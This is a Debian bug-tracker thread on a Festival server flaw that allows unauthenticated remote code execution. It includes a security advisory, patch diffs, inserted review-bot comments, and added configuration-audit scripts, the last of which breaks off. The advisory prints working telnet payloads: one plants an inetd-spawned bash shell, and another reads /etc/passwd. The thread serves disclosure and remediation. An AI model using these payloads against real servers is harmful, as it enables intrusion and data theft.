Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Tuesday 19 February 2008 20:12:29 Nico Golde wrote:
> > It probably also needs rewording since SuSE confirmed it affected them
> > and I think we agree it affects Debian. How do we go about doing that -
> > is that something for you guys or do I need to get involved?
> I see your point, I will contact mitre to update the CVE id or to assign
> a new one.

No news from MITRE? At least their CVE entry doesn't appear to be updated.

> I guess they will happily release a DSA if someone comes up and provides
> a fixed stable package that just works.

I've attached a patch that I think resolves this issue on stable - no
warranties.

Just wanted to make this final email as I'm intending to release my advisory
shortly subject to any updates here.

Tim
-- 
Tim Brown
mailto:[EMAIL PROTECTED]
http://www.nth-dimension.org.uk/

diff -rN festival-1.4.3/debian/changelog festival-1.4.3-new/debian/changelog 0a1,18 festival (1.4.3-17.3) unstable; urgency=high * Fix root security hole. Thanks to Tim Brown. + debian/festival.init: Read festival.scm upon start. (Closes: #466146) * debian/festival.scm: + Add sane default values for server. The festival init script now uses these values while starting the server. * debian/README.Debian: + Document some changes on daemon mode. * debian/templates, debian/config, debian/festival.postinst: + Ask for server password during install. * debian/lintian-override: + Permission of /etc/festival.scm should be 0600. -- Tim Brown [EMAIL PROTECTED] Sat, 01 Mar 2008 12:40:33 + diff -rN festival-1.4.3/debian/config festival-1.4.3-new/debian/config 0a1,20 #!/bin/sh -e # Source debconf library. . 
/usr/share/debconf/confmodule # grab selected config values from the config file and store them # in debconf's database # first grab existing value (keep config file's existing value) CONFIG_FILE=/etc/festival.scm # to help security, let password be entered afresh each time # (and don't display the value left in the debconf database of # password written to config file) db_set festival/server_passwd db_input critical festival/server_passwd || true db_go || true db_stop || true diff -rN festival-1.4.3/debian/festival.init festival-1.4.3-new/debian/festival.init 27c27 --exec $DAEMON -- --server --- --exec $DAEMON -- --server -b /etc/festival.scm 39c39 --exec $DAEMON -- --server --- --exec $DAEMON -- --server -b /etc/festival.scm diff -rN festival-1.4.3/debian/festival.postinst festival-1.4.3-new/debian/festival.postinst 0a1,50 #!/bin/sh set -e . /usr/share/debconf/confmodule # write selected values into config file CONFIG_FILE=/etc/festival.scm PASSWD_ENTRY=server_passwd PASSWD=your_festival_passwd db_get festival/server_passwd PASSWD=$RET # insert the entry, if it is missing (which it ought not to be) grep -Eq ^[[:blank:]]*\(set![[:blank:]][[:blank:]]*$PASSWD_ENTRY[[:blank:]] $CONFIG_FILE || \ echo (set! $PASSWD_ENTRY \$PASSWD\) $CONFIG_FILE # only process the password if it is not empty if [ $PASSWD ]; then # copy config file here in order to preserve permissions when actually # building the tmp file in the sed step cp -a -f $CONFIG_FILE $CONFIG_FILE.tmp # escape sed special characters #echo $PASSWD | sed -n 's|[\|\$\\.\*\%\^\+\?]|\\|g' PASSWD=$(echo $PASSWD | sed 's|[\[\(\)\|\$\\.\*\%\^\+\?\/]|\\|g') sed -e s/(set.[[:blank:]]\+$PASSWD_ENTRY.*)/(set! 
$PASSWD_ENTRY \$PASSWD\)/ \ $CONFIG_FILE $CONFIG_FILE.tmp mv -f $CONFIG_FILE.tmp $CONFIG_FILE # remove the password from the debconf database db_set festival/server_passwd password written to config file fi # extra safety check: ensure passwords in config file cannot be read by anyone chown nobody /etc/festival.scm chmod og-r $CONFIG_FILE # Supporta log file mkdir -p /var/log/festival touch /var/log/festival/festival.log chown nobody:audio /var/log/festival/festival.log # must indicate we are done with debconf, or the script will hang when the # server is started below (DEBHELPER section, via dh_installinit). db_stop #DEBHELPER# diff -rN festival-1.4.3/debian/festival.postrm festival-1.4.3-new/debian/festival.postrm 4a5,9 if [ $1 = purge ];then rm -rf /var/log/festival rm -f /etc/festival.scm fi diff -rN festival-1.4.3/debian/festival.scm festival-1.4.3-new/debian/festival.scm 3a4,23 ; Maximum number of clients on the server (set! server_max_clients 10) ; Server port (set! server_port 1314) ; Server password (set! server_passwd nil) ; Log file location (set! server_log_file /var/log/festival/festival.log) ; Server access list (hosts) ; Example: ; (set! server_access_list '([^.]+ 127.0.0.1 localhost.* 192.168.*)) ; Secure default: (set! server_access_list '([^.]+ 127.0.0.1 localhost)) ; Server deny list (hosts) diff -rN festival-1.4.3/debian/lintian.override festival-1.4.3-new/debian/lintian.override
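Review bot: the changelog hunk says the lintian override is for /etc/festival.scm being 0600, but the postinst hunk only runs `chmod og-r $CONFIG_FILE`, which clears the read bits and leaves any group/other write or execute bits in place; an explicit `chmod 0600 $CONFIG_FILE` matches what the changelog promises and what the override asserts. The entry also lists debian/README.Debian and debian/templates, yet no hunks for those files appear in the diff as posted (it ends at the lintian.override header), so the posted patch looks truncated; the templates hunk matters because the debconf question's type decides whether the password is echoed, the point raised earlier in this thread.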
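Review bot: in the debian/config hunk CONFIG_FILE is assigned and never used, and the comment block about grabbing existing values from the config file describes work the script does not do; drop both or make the script actually read the current value. Clearing the question with db_set before db_input is the right way to force a fresh entry on every reconfigure, so that part can stay.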
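Review bot: the two festival.init hunks (27c27 and 39c39) change the same command line in two places; put `--server -b /etc/festival.scm` in a DAEMON_OPTS variable so start and restart cannot drift apart. Also, the postinst chowns /etc/festival.scm to nobody and removes group/other read, so the init script must start the daemon as that same user (start-stop-daemon --chuid); otherwise the file passed with -b is unreadable to the daemon and the server either fails to start or comes up without the access list and password it was meant to load.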
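Review bot: the postinst hunk leaves the server unauthenticated when the debconf answer is empty: the `if [ $PASSWD ]` guard skips the sed step, so the shipped `(set! server_passwd nil)` stays in place and the only protection left is the access list; generate a random password when none is entered rather than silently accepting none. Two further points on the same hunk: the password ends up in sed's argument list (`sed -e s/.../(set! $PASSWD_ENTRY \$PASSWD\)/`), where any local user can read it from ps for the duration of the call, so build the replacement with the printf builtin or feed sed its script on stdin; and the escaping line, as it appears here, substitutes each special character with a literal backslash (`\\` rather than `\\&` in the replacement), so a password containing `.`, `$` or `/` is mangled before it is written. Using nobody as the owner also shares the file with every other process running as nobody; the unstable package uses a dedicated festival user (the `festival,audio` ownership discussed earlier in this thread), and the stable backport should too. Finally, if /etc/festival.scm is shipped as a conffile (debhelper marks files under /etc as conffiles), rewriting it from postinst breaks Policy 10.7.3 and produces conffile prompts on the next upgrade; generating the file at install time from a template under /usr/share, or keeping the password in a separate included file, avoids that.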
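Review bot: the postrm hunk removes the files on purge but not the debconf data: since the package asks festival/server_passwd, postrm should source /usr/share/debconf/confmodule and call db_purge on purge so the question (and any value left behind when the postinst db_set is skipped) does not linger in the debconf database. If /etc/festival.scm is a conffile, dpkg removes it itself on purge and the `rm -f` is redundant.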
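Review bot: the festival.scm hunk's "Secure default" access list `'([^.]+ 127.0.0.1 localhost)` is wider than localhost: the entries are matched as regular expressions against the connecting host's name, and `[^.]+` matches any hostname without a dot, so any peer whose reverse lookup yields a bare single-label name is admitted. If the intent is local-only, keep just "127.0.0.1" and "localhost" (and "::1" where IPv6 is in use). The same applies to the commented example, where `localhost.*` and `192.168.*` are regexes in which `.` matches any character, not a literal dot.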
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
Hi Tim,
* Tim Brown [EMAIL PROTECTED] [2008-03-01 15:28]:
> On Tuesday 19 February 2008 20:12:29 Nico Golde wrote:
> > > It probably also needs rewording since SuSE confirmed it affected them
> > > and I think we agree it affects Debian. How do we go about doing that -
> > > is that something for you guys or do I need to get involved?
> > I see your point, I will contact mitre to update the CVE id or to assign
> > a new one.
> 
> No news from MITRE? At least their CVE entry doesn't appear to be updated.

Huh?

which allows local and remote attackers to execute arbitrary commands

Cheers
Nico
-- 
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Saturday 01 March 2008 14:44:01 Nico Golde wrote:
> Hi Tim,
> * Tim Brown [EMAIL PROTECTED] [2008-03-01 15:28]:
> > On Tuesday 19 February 2008 20:12:29 Nico Golde wrote:
> > > > It probably also needs rewording since SuSE confirmed it affected
> > > > them and I think we agree it affects Debian. How do we go about doing
> > > > that - is that something for you guys or do I need to get involved?
> > > I see your point, I will contact mitre to update the CVE id or to
> > > assign a new one.
> > 
> > No news from MITRE? At least their CVE entry doesn't appear to be
> > updated.
> 
> Huh?
> 
> which allows local and remote attackers to execute arbitrary commands
> 
> Cheers
> Nico

I saw that, but assumed it would reference Debian in some manner. After all
Debian distributions (and derivatives including Ubuntu hardy) are/were
exploitable.

Tim
-- 
Tim Brown
mailto:[EMAIL PROTECTED]
http://www.nth-dimension.org.uk/

-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe.
Trouble? Contact [EMAIL PROTECTED]
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
Hi Tim,
* Tim Brown [EMAIL PROTECTED] [2008-03-01 16:19]:
> On Saturday 01 March 2008 14:44:01 Nico Golde wrote:
> [...]
> > Huh?
> > 
> > which allows local and remote attackers to execute arbitrary commands
> [...]
> I saw that, but assumed it would reference Debian in some manner. After
> all Debian distributions (and derivatives including Ubuntu hardy) are/were
> exploitable.

Nope I don't think that will happen :/

Cheers
Nico
-- 
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
retitle 466146 festival: CVE-2007-4074 default configuration allows unauthenticated remote code execution
thanks

Hi Tim,
* Tim Brown [EMAIL PROTECTED] [2008-02-17 04:18]:
> Package: festival
> Version: 1.96~beta-5
> Severity: critical
> Tags: security
> Justification: root security hole
> 
> Nth Dimension Security Advisory (NDSA20080215)
> 
> Date: 15th February 2008
> Author: Tim Brown mailto:[EMAIL PROTECTED]
> URL: http://www.nth-dimension.org.uk/ / http://www.machine.org.uk/
> Product: Festival 1.96:beta July 2004 http://www.cstr.ed.ac.uk/projects/festival.html
> Vendor: Centre for Speech Technology Research, University of Edinburgh http://www.cstr.ed.ac.uk/
> Risk: Medium
[...]

CVE-2007-4074 was assigned to this issue.

======================================================
Name: CVE-2007-4074
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4074
Reference: CONFIRM:http://bugs.gentoo.org/show_bug.cgi?id=170477
Reference: GENTOO:GLSA-200707-10
Reference: URL:http://security.gentoo.org/glsa/glsa-200707-10.xml
Reference: SUSE:SUSE-SR:2007:021
Reference: URL:http://lists.opensuse.org/opensuse-security-announce/2007-10/msg6.html
Reference: BID:25069
Reference: URL:http://www.securityfocus.com/bid/25069
Reference: SECUNIA:26229
Reference: URL:http://secunia.com/advisories/26229
Reference: SECUNIA:27271
Reference: URL:http://secunia.com/advisories/27271
Reference: XF:gentoo-festival-privilege-escalation(35606)
Reference: URL:http://xforce.iss.net/xforce/xfdb/35606

The default configuration of Centre for Speech Technology Research (CSTR)
Festival 1.95 beta (aka 2.0 beta) on Gentoo Linux is run locally with
elevated privileges without requiring authentication, which allows
context-dependent attackers to execute arbitrary commands via the local
daemon on port 1314, a different vulnerability than CVE-2001-0956.

Kind regards
Nico
-- 
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Tue, Feb 19, 2008 at 12:16:14PM +0100, Nico Golde wrote:
> Hi Tim,
> this is somehow strange, this CVE id was already fixed in 1.4.3-21
> referring to the security tracker (see bug #435445 for reference). Did
> this fix get lost somewhere in the package history?

Dear Nico,

It appears that the troublesome issue of running festival as a less
privileged user was handled in the last upload. However, what was not
handled was the restriction of access to localhost by default, and the
necessity to introduce a password for this purpose. The last upload, which
Tim has checked a few times, introduces this feature, and thus, makes the
security aspect a bit more complete.

Hope this is fine. Thanks for the follow up.

Kumar
-- 
Kumar Appaiah,
458, Jamuna Hostel,
Indian Institute of Technology Madras,
Chennai - 600 036
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
Hi Tim,
this is somehow strange, this CVE id was already fixed in 1.4.3-21 referring
to the security tracker (see bug #435445 for reference). Did this fix get
lost somewhere in the package history?

Kind regards
Nico
-- 
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Tue, 19 Feb 2008, Kumar Appaiah wrote:
> On Tue, Feb 19, 2008 at 12:16:14PM +0100, Nico Golde wrote:
> > Hi Tim,
> > this is somehow strange, this CVE id was already fixed in 1.4.3-21
> > referring to the security tracker (see bug #435445 for reference). Did
> > this fix get lost somewhere in the package history?
> 
> It appears that the troublesome issue of running festival as a less
> privileged user was handled in the last upload. However, what was not
> handled was the restriction of access to localhost by default, and the
> necessity to introduce a password for this purpose. The last upload, which
> Tim has checked a few times, introduces this feature, and thus, makes the
> security aspect a bit more complete.
> 
> Hope this is fine. Thanks for the follow up.

This is my impression too. Gentoo introduced localhost restrictions in their
patch for the original issue, in addition to changing the init process of
the server so that it runs under its own privileges rather than root - they
didn't add authentication though. The Debian patch only changed the init
process of the server, which while preventing a full root compromise, did
not prevent remote unauthenticated access.

Looking at the previous bug history there was some discussion about
disabling the system command too, but IMO this does little to fix the
underlying problem of an unauthenticated scheme interpreter bound to a
remote port with no ACLs or authentication.

Tim
-- 
Tim Brown
mailto:[EMAIL PROTECTED]
http://www.nth-dimension.org.uk/
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
Nico,

I've just noticed that the security tracker
http://security-tracker.debian.net/tracker/status/release/unstable has been
updated for festival. However it is wrong. This bug *is* remotely
exploitable (due to the aforementioned lack of ACLs).

Tim
-- 
Tim Brown
mailto:[EMAIL PROTECTED]
http://www.nth-dimension.org.uk/
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
Hi Tim,
* Tim Brown [EMAIL PROTECTED] [2008-02-19 20:08]:
> I've just noticed that the security tracker
> http://security-tracker.debian.net/tracker/status/release/unstable has
> been updated for festival. However it is wrong. This bug *is* remotely
> exploitable (due to the aforementioned lack of ACLs).

Sure it is :)

The remote exploitability status isn't set manually by us. This is
extracted automatically from the NVD text
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-4074 which doesn't mention the
word 'remote'. I think that's the reason. Patches welcome :)

Kind regards
Nico
-- 
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Tuesday 19 February 2008 19:20:23 Nico Golde wrote:
> * Tim Brown [EMAIL PROTECTED] [2008-02-19 20:08]:
> > I've just noticed that the security tracker
> > http://security-tracker.debian.net/tracker/status/release/unstable has
> > been updated for festival. However it is wrong. This bug *is* remotely
> > exploitable (due to the aforementioned lack of ACLs).
> 
> Sure it is :)
> 
> The remote exploitability status isn't set manually by us. This is
> extracted automatically from the NVD text
> http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-4074 which doesn't mention
> the word 'remote'. I think that's the reason. Patches welcome :)

Okay, so the CVE entry is wrong (which probably explains why it wasn't
correctly resolved by the maintainers when it was first looked at). It
probably also needs rewording since SuSE confirmed it affected them and I
think we agree it affects Debian. How do we go about doing that - is that
something for you guys or do I need to get involved?

Also, since we have a working patch for the issue on mentors what happens
now. Can it go through as NMU? What about the backport to stable and
testing?

Tim
-- 
Tim Brown
mailto:[EMAIL PROTECTED]
http://www.nth-dimension.org.uk/
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
Hi Tim,
* Tim Brown [EMAIL PROTECTED] [2008-02-19 20:57]:
> On Tuesday 19 February 2008 19:20:23 Nico Golde wrote:
> > * Tim Brown [EMAIL PROTECTED] [2008-02-19 20:08]:
> > > I've just noticed that the security tracker
> > > http://security-tracker.debian.net/tracker/status/release/unstable
> > > has been updated for festival. However it is wrong. This bug *is*
> > > remotely exploitable (due to the aforementioned lack of ACLs).
> > 
> > Sure it is :)
> > 
> > The remote exploitability status isn't set manually by us. This is
> > extracted automatically from the NVD text
> > http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-4074 which doesn't mention
> > the word 'remote'. I think that's the reason. Patches welcome :)
> 
> Okay, so the CVE entry is wrong (which probably explains why it wasn't
> correctly resolved by the maintainers when it was first looked at).

Maybe it's also the Access Vector: string, not sure. Florian Weimer knows
the details.

> It probably also needs rewording since SuSE confirmed it affected them and
> I think we agree it affects Debian. How do we go about doing that - is
> that something for you guys or do I need to get involved?

I see your point, I will contact mitre to update the CVE id or to assign a
new one.

> Also, since we have a working patch for the issue on mentors what happens
> now. Can it go through as NMU?

The maintainer already uploaded a fixed version to unstable so no need for
that. An NMU is only needed if the maintainer can't do an upload himself.

> What about the backport to stable and testing?

The package should migrate to testing in two days. If it has problems on
migration we may do a testing security upload for this.

For stable please contact. Referring to our svn the stable security did not
release a DSA for CVE-2007-4074 because it was a minor issue. If you think
this should get fixed in stable please contact [EMAIL PROTECTED]
I guess they will happily release a DSA if someone comes up and provides a
fixed stable package that just works.
If not, the maintainer still has a high chance to get this fixed via a
regular point update. For this please contact the release team.

Kind regards
Nico
-- 
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Monday 18 February 2008 07:42:06 Kumar Appaiah wrote:
> Dear Tim,
> 
> Many thanks for the constant support. The package should now be all right
> with this change, available at the same location.

Not a problem - it seems to build cleanly now with no problems. I guess it
can be pushed to unstable and backported to stable security.

Tim
-- 
Tim Brown
mailto:[EMAIL PROTECTED]
http://www.nth-dimension.org.uk/
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
tags 466146 pending
thanks

On Sun, Feb 17, 2008 at 05:51:38AM +, Tim Brown wrote:
> Can I suggest that a password is set (perhaps take a look at the Debian
> MySQL server package which does something similar for the debian-sys-maint
> in the /etc/mysql/debian.cnf file). Limiting access to local hosts is an
> improvement, but as noted it does not guard against local privilege
> escalation attacks.

I have now added this feature. A package is ready for testing at mentors:

dget -x http://mentors.debian.net/debian/pool/main/f/festival/festival_1.96~beta-6.dsc

Please note that I now use debconf to ask for the password to be entered. I
have tested that the system works fine, but as this is my first debconf
experience, a quick review would be appreciated, followed by upload, as this
is a security bug.

Thanks.

Kumar
-- 
Kumar Appaiah,
458, Jamuna Hostel,
Indian Institute of Technology Madras,
Chennai - 600 036
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Sunday 17 February 2008 16:23:37 Kumar Appaiah wrote:
> dget -x http://mentors.debian.net/debian/pool/main/f/festival/festival_1.96~beta-6.dsc
> 
> Please note that I now use debconf to ask for the password to be entered.
> I have tested that the system works fine, but as this is my first debconf
> experience, a quick review would be appreciated, followed by upload, as
> this is a security bug.

Kumar,

I've just built it here. It is lintian clean and the patch provides the
required security fix. However 2 small points,

1) The logging doesn't work as /var/log/festival isn't created (and owned by
   festival,audio)
2) Passwords are displayed by debconf rather than hiding them with *'s.

I'm only a fellow maintainer, but I'm sure your mentor can provide
appropriate feedback on these issues.

Cheers,

Tim
-- 
Tim Brown
mailto:[EMAIL PROTECTED]
http://www.nth-dimension.org.uk/
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Sunday 17 February 2008 16:23:37 Kumar Appaiah wrote:
> Please note that I now use debconf to ask for the password to be entered.
> I have tested that the system works fine, but as this is my first debconf
> experience, a quick review would be appreciated, followed by upload, as
> this is a security bug.

Another thought, the fix will require backporting to stable so that it can
go into the security updates.

Tim
-- 
Tim Brown
mailto:[EMAIL PROTECTED]
http://www.nth-dimension.org.uk/
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Sun, Feb 17, 2008 at 05:32:44PM +, Tim Brown wrote:
> I've just built it here. It is lintian clean and the patch provides the
> required security fix. However 2 small points,
> 
> 1) The logging doesn't work as /var/log/festival isn't created (and owned
>    by festival,audio)
> 2) Passwords are displayed by debconf rather than hiding them with *'s.
> 
> I'm only a fellow maintainer, but I'm sure your mentor can provide
> appropriate feedback on these issues.

First of all, many thanks for pointing out both these issues. I have solved
both, and the fixed version is here:

dget -x http://mentors.debian.net/debian/pool/main/f/festival/festival_1.96~beta-6.dsc

Further comments and feedback would be welcome.

Kumar
-- 
Kumar Appaiah,
458, Jamuna Hostel,
Indian Institute of Technology Madras,
Chennai - 600 036
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Monday 18 February 2008 01:40:00 Kumar Appaiah wrote:
> On Sun, Feb 17, 2008 at 05:32:44PM +, Tim Brown wrote:
> > I've just built it here. It is lintian clean and the patch provides the
> > required security fix. However 2 small points,
> > 
> > 1) The logging doesn't work as /var/log/festival isn't created (and
> >    owned by festival,audio)
> > 2) Passwords are displayed by debconf rather than hiding them with *'s.
> > 
> > I'm only a fellow maintainer, but I'm sure your mentor can provide
> > appropriate feedback on these issues.
> 
> First of all, many thanks for pointing out both these issues. I have
> solved both, and the fixed version is here:
> 
> dget -x http://mentors.debian.net/debian/pool/main/f/festival/festival_1.96~beta-6.dsc

Looks good apart from Lintian reporting:

N:
N:   chown user.group is called in one of the maintainer scripts. The
N:   correct syntax is chown user:group. Using . as a separator is still
N:   supported by the GNU tools, but it will fail as soon as a system uses
N:   the . in user or group names.
N:

Tim
-- 
Tim Brown
mailto:[EMAIL PROTECTED]
http://www.nth-dimension.org.uk/
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On 18/02/2008, Tim Brown wrote:
> > dget -x http://mentors.debian.net/debian/pool/main/f/festival/festival_1.96~beta-6.dsc
> 
> Looks good apart from Lintian reporting:
> 
> N:
> N:   chown user.group is called in one of the maintainer scripts. The
> N:   correct syntax is chown user:group. Using . as a separator is still
> N:   supported by the GNU tools, but it will fail as soon as a system uses
> N:   the . in user or group names.
> N:

Dear Tim,

Many thanks for the constant support. The package should now be all right
with this change, available at the same location.

dget -x http://mentors.debian.net/debian/pool/main/f/festival/festival_1.96~beta-6.

Thanks again!

Kumar
-- 
Kumar Appaiah,
458, Jamuna Hostel,
Indian Institute of Technology Madras,
Chennai - 600036
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
Package: festival
Version: 1.96~beta-5
Severity: critical
Tags: security
Justification: root security hole

Nth Dimension Security Advisory (NDSA20080215)

Date: 15th February 2008
Author: Tim Brown mailto:[EMAIL PROTECTED]
URL: http://www.nth-dimension.org.uk/ / http://www.machine.org.uk/
Product: Festival 1.96:beta July 2004 http://www.cstr.ed.ac.uk/projects/festival.html
Vendor: Centre for Speech Technology Research, University of Edinburgh http://www.cstr.ed.ac.uk/
Risk: Medium

Summary

The Festival server is vulnerable to unauthenticated remote code execution.
Further research indicates that this vulnerability has already been reported
as a local privilege escalation against both the Gentoo and SuSE GNU/Linux
distributions. The remote form of this vulnerability was identified in
1.96~beta-5 as distributed in Debian unstable.

Technical Details

The Festival server, which can be started using "festival --server", is
vulnerable to unauthenticated remote command execution due to the inclusion
of a scheme interpreter. It is possible to make use of standard scheme
functions in order to execute further code, like so:

$ telnet 10.0.0.1 1314
Trying 10.0.0.1...
Connected to 10.0.0.1.
(system echo ' stream tcp nowait festival /bin/bash /bin/bash -i' /tmp/backdoor.conf; /usr/sbin/inetd /tmp/backdoor.conf)
Connection closed by foreign host.

Whilst this is the most trivial way that the vulnerability can be exploited,
the inclusion of a scheme interpreter available without authentication allows
for other vectors of attack. Scheme functions such as SayText and tts (which
reads a file on the vulnerable system) pose particular interest, for example:

$ telnet 10.0.0.1 1314
Trying 10.0.0.1...
Connected to 10.0.0.1.
(tts /etc/passwd nil)

Whilst it is acknowledged that the inclusion of the scheme interpreter in
this manner is entirely intentional, the default insecure state of the server
could be exploited, particularly where the user is unaware of the server's
existence.

Solutions

In order to completely protect against the vulnerability (in the short term),
Nth Dimension recommend turning off the server or filtering connections to
the affected port using a host based firewall. The server itself can be
secured by applying the patches located at
http://bugs.gentoo.org/show_bug.cgi?id=170477. This includes applying a
default configuration which limits access to localhost and setting an
optional password which prevents unauthenticated access.

-- System Information:
Debian Release: lenny/sid
  APT prefers oldstable
  APT policy: (500, 'oldstable'), (500, 'unstable'), (500, 'testing'), (500, 'stable'), (1, 'experimental')
Architecture: i386 (i686)

Kernel: Linux 2.6.22-3-686 (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages festival depends on:
ii  adduser        3.105             add and remove users and groups
ii  libaudiofile0  0.2.6-7           Open-source version of SGI's audio
ii  libc6          2.7-8             GNU C Library: Shared libraries
ii  libesd0        0.2.36-3          Enlightened Sound Daemon - Shared
ii  libestools1.2  1:1.2.96~beta-2   Edinburgh Speech Tools Library
ii  libgcc1        1:4.3-20080202-1  GCC support library
ii  libncurses5    5.6+20080203-1    Shared libraries for terminal hand
ii  libstdc++6     4.3-20080202-1    The GNU Standard C++ Library v3
ii  lsb-base       3.1-24            Linux Standard Base 3.1 init scrip
ii  sgml-base      1.26              SGML infrastructure and SGML catal
ii  sysv-rc        2.86.ds1-53       System-V-like runlevel change mech

Versions of packages festival recommends:
ii  festvox-kallpc16k [festival-v  1.4.0-5  American English male speaker for

-- no debconf information
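The Solutions section above comes down to two settings in the server's Scheme configuration: an access list that admits only localhost, and a non-nil server_passwd. The script below is an added example for checking a festival.scm against exactly those two points; it is not part of the advisory, the bug thread or the festival package. It assumes the (set! server_access_list '(...)) and (set! server_passwd "...") syntax shown in the patch later in this thread, runs on two constructed sample files it writes itself, and the value CHANGE-ME-placeholder is a placeholder, not a real password.

```shell
#!/bin/sh
# Added example (not from the bug thread or the festival package): audit a
# festival.scm server configuration for the two weaknesses discussed in
# Bug#466146, a nil/unset server_passwd and an access list wider than
# the loopback host. The script only reads the file; it changes nothing.

set -f   # no globbing: ACL entries such as "[^.]+" or "192.168.*" are patterns

# check_festival_scm FILE
# Prints one "WEAK: ..." line per finding. Exit status 0 = hardened, 1 = weak.
check_festival_scm() {
    file="$1"
    rc=0

    # Password: only a non-empty double-quoted string counts; nil, an empty
    # string or no setting at all means anyone who connects gets the
    # Scheme interpreter.
    if ! grep -Eq '^[[:blank:]]*\(set![[:blank:]]+server_passwd[[:blank:]]+"[^"]+"\)' "$file"; then
        echo "WEAK: $file: server_passwd is nil or unset (unauthenticated access)"
        rc=1
    fi

    # Access list: use the last uncommented (set! server_access_list ...) line.
    # Lines starting with ';' (Scheme comments) never match the anchored regex.
    acl_line=$(grep -E '^[[:blank:]]*\(set![[:blank:]]+server_access_list[[:blank:]]' "$file" | tail -n 1)
    if [ -z "$acl_line" ]; then
        echo "WEAK: $file: server_access_list is not set, so this file does not restrict connecting hosts"
        rc=1
    else
        # '("127.0.0.1" "localhost")  ->  127.0.0.1 localhost
        entries=$(printf '%s\n' "$acl_line" | sed -e "s/^.*'(//" -e 's/))[[:blank:]]*$//' -e 's/"//g')
        for entry in $entries; do
            case "$entry" in
                127.0.0.1|localhost|::1) ;;   # loopback only: fine
                *)
                    # anything else is a regex that may admit remote hosts
                    echo "WEAK: $file: server_access_list entry '$entry' admits non-local hosts"
                    rc=1 ;;
            esac
        done
    fi
    return $rc
}

# write_samples DIR: two constructed sample configurations (not real files).
write_samples() {
    cat > "$1/weak.scm" <<'EOF'
; shipped-style defaults: no password, access list taken from the
; commented example in the Debian patch
(set! server_port 1314)
(set! server_passwd nil)
(set! server_access_list '("[^.]+" "127.0.0.1" "localhost.*" "192.168.*"))
EOF
    cat > "$1/hardened.scm" <<'EOF'
(set! server_port 1314)
(set! server_passwd "CHANGE-ME-placeholder")
(set! server_access_list '("127.0.0.1" "localhost"))
EOF
}

samples=$(mktemp -d)
write_samples "$samples"
check_festival_scm "$samples/weak.scm" || echo "-> weak.scm needs hardening"
check_festival_scm "$samples/hardened.scm" && echo "-> hardened.scm looks hardened"
rm -rf "$samples"
```

The weak sample produces four findings (the nil password plus the three regex entries that are not plain loopback names), the hardened one none. `set -f` matters: without it, `for entry in $entries` would let the shell expand `[^.]+` and `192.168.*` as filename globs, the same class of mistake as the unquoted `echo $PASSWD` in the postinst posted earlier in this thread.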
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
tags 466146 pending
thanks

Hi!

A package is ready for upload at mentors. Thanks for the report. If, after
consulting my sponsor and some security people, I find that it is OK, it
shall be uploaded.

Thanks!

Kumar
-- 
Kumar Appaiah,
458, Jamuna Hostel,
Indian Institute of Technology Madras,
Chennai - 600 036
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Sunday 17 February 2008 05:13:21 Kumar Appaiah wrote:
> tags 466146 pending
> thanks
> 
> Hi!
> 
> A package is ready for upload at mentors. Thanks for the report. If,
> after consulting my sponsor and some security people, I find that it is
> OK, it shall be uploaded.

Kumar,

Can I suggest that a password is set (perhaps take a look at the Debian
MySQL server package which does something similar for the debian-sys-maint
in the /etc/mysql/debian.cnf file). Limiting access to local hosts is an
improvement, but as noted it does not guard against local privilege
escalation attacks.

Tim
-- 
Tim Brown
mailto:[EMAIL PROTECTED]
http://www.nth-dimension.org.uk/
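Tim's suggestion above, a server password written at install time the way the MySQL package handles debian-sys-maint, is easy to get subtly wrong: the secret must not pass through a command line (any local user can read argv from ps), the file must end up mode 0600, and characters like `"` and `\` must be escaped so the Scheme string stays well-formed. The snippet below is an added example of doing those three things; it is not code from this thread or from the festival package, and the helper names set_server_passwd, scheme_escape and random_passwd are hypothetical. It assumes a festival.scm-style file with one (set! server_passwd ...) line.

```shell
#!/bin/sh
# Added example, not from the bug thread or the festival package.
# Writes a server password into a festival.scm-style file the way a
# maintainer script could do it safely:
#   - the password never appears on a command line (printf is a shell
#     builtin, so nothing shows up in ps; sed only ever sees stdin)
#   - the file is rewritten atomically with mode 0600
#   - Scheme string metacharacters are escaped

set -f   # no filename globbing of password contents

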